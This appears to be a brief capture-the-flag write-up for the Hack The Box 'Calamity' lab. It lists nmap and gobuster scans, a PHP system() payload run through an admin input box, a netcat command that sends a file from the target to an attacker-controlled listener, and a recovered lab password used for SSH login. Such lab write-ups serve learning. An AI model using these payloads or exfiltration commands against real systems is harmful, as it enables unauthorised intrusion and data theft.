Some commands used in becoming xalvas on hackthebox calamity

Just hello wording github pages. Nothing serious here… Just testing.

nmap -Pn -sV -sC -oA calamity 10.10.10.27

Port 80 is open but when you browse it there is no entry point.So lets bust it!

gobuster -w directory-list-2.3-medium.txt -o gobuster.log -x php.html -t 50 -u http://10.10.10.27

Now we have admin.php and uploads dir. Uploads dir is empty. Checking the source of admin.php… Voila! We have a password. After you login check the input box with:

<?php system('ls /home/');?>

There are wav files so this should be a stego challenge. Get wav file. On local machine run:

nc -lvnp 999 > rick.wav 

On remote machine run:

nc "your_local_ip_adress_without_the_quotes_like_10.10.10.10" 999 < rick.wav

Now when you invert the files you will have the password as 18547936..* to login as xalvas:

ssh xalvas@10.10.10.27